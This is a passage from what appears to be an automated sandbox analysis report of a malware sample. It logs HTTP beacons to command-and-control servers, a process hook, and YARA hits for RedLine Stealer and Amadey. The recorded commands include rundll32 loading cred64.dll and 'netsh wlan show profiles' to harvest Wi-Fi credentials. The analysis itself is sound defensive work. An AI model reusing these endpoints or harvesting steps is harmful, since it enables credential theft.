                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                138192.168.2.550074185.81.68.14780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:05.236004114 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:39:05.356888056 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:39:06.733350039 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:05 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                139192.168.2.550080185.81.68.14780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:06.969074965 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:39:07.088928938 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:39:08.433083057 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:07 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                140192.168.2.550081185.81.68.14780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:07.082148075 CET309OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:39:08.461338043 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:07 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                141192.168.2.550082185.81.68.14880
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:07.082216978 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:39:08.461426020 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:07 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                142192.168.2.550088185.81.68.14780
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:39:08.657063007 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:39:08.777204037 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:39:10.276473045 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:39:09 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                CreateProcessInternalWINLINEexplorer.exe
                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5F

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:19:36:56
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\yINR7uQlPr.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\yINR7uQlPr.exe"
                                                                                                                                                                Imagebase:0x7ff79e380000
                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:19:36:56
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:19:36:56
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                Imagebase:0x7ff7a91b0000
                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:3
                                                                                                                                                                Start time:19:36:56
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                Imagebase:0x7ff7179d0000
                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:19:36:56
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                Imagebase:0x7ff674740000
                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:19:37:08
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
                                                                                                                                                                Imagebase:0x7ff6743d0000
                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:19:37:08
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:19:37:08
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                Imagebase:0x7ff7a91b0000
                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:9
                                                                                                                                                                Start time:19:37:08
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                Imagebase:0x7ff7179d0000
                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:11
                                                                                                                                                                Start time:19:37:15
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
                                                                                                                                                                Imagebase:0x7ff690010000
                                                                                                                                                                File size:5'915'948 bytes
                                                                                                                                                                MD5 hash:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 29%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:12
                                                                                                                                                                Start time:19:37:16
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
                                                                                                                                                                Imagebase:0x7ff6743d0000
                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:13
                                                                                                                                                                Start time:19:37:16
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:14
                                                                                                                                                                Start time:19:37:16
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                Imagebase:0x7ff7a91b0000
                                                                                                                                                                File size:632'808 bytes
                                                                                                                                                                MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:15
                                                                                                                                                                Start time:19:37:16
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                Imagebase:0x7ff7179d0000
                                                                                                                                                                File size:69'632 bytes
                                                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:19:37:17
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
                                                                                                                                                                Imagebase:0x7ff690010000
                                                                                                                                                                File size:5'915'948 bytes
                                                                                                                                                                MD5 hash:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:17
                                                                                                                                                                Start time:19:37:18
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe"
                                                                                                                                                                Imagebase:0x5c0000
                                                                                                                                                                File size:307'712 bytes
                                                                                                                                                                MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 88%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:18
                                                                                                                                                                Start time:19:37:23
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe"
                                                                                                                                                                Imagebase:0x690000
                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 63%, ReversingLabs
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:19
                                                                                                                                                                Start time:19:37:24
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                                                                                                                                                                Imagebase:0x7a0000
                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:19:37:26
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                Imagebase:0x7a0000
                                                                                                                                                                File size:441'344 bytes
                                                                                                                                                                MD5 hash:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:19:37:32
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                Imagebase:0xc70000
                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:19:37:32
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                Imagebase:0x7ff7bc440000
                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:19:37:32
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                Imagebase:0xc70000
                                                                                                                                                                File size:61'440 bytes
                                                                                                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:24
                                                                                                                                                                Start time:19:37:32
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                                                                                                                                                                Imagebase:0x7ff7bc440000
                                                                                                                                                                File size:71'680 bytes
                                                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:19:37:33
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                Imagebase:0x7ff734670000
                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:19:37:33
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:19:37:33
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:netsh wlan show profiles
                                                                                                                                                                Imagebase:0x7ff734670000
                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:28
                                                                                                                                                                Start time:19:37:33
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:29
                                                                                                                                                                Start time:19:37:36
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
